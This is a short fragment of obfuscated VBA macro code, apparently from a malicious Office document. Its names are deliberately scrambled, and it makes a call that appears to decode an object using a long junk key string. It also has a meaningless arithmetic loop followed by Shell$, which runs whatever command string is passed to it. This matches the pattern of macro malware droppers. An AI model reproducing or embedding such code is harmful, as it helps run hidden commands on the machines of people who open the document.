edIfCsfPNNFA = VWSWKMPYtattOHpeXW(IMkIsXtByMF("OBJECTHERE"), "jkflsajioJIOSDFAti$@*($@t($@i*t$@I924U90G42i*g@$(gsg(sdf(G4UJPIOGDE09GERUJKLSDGFJIO4TU0924T(@$i*g$i*greiiUJ9G3402--23U9RGEU9SRGJLKDFM,.CXVBNM,.DFGS;KLDFGSHJKLUI3T4*y#$%*y%#ugtreufusdJKLSFGDIO34G9HIOBNFJKDXCVHUJDFGSHUIOGRE")
End Function
Public Function RdFRwvoLGoM(DAfTCyQtIyve As String) As Long
Dim NuuNYWHUzQessxzlf, uAhMAlYLoafRVQE As Integer
NuuNYWHUzQessxzlf = 5
uAhMAlYLoafRVQE = 82
While NuuNYWHUzQessxzlf < uAhMAlYLoafRVQE
uAhMAlYLoafRVQE = uAhMAlYLoafRVQE - NuuNYWHUzQessxzlf
Wend
Shell$ DAfTCyQtIyve
End Function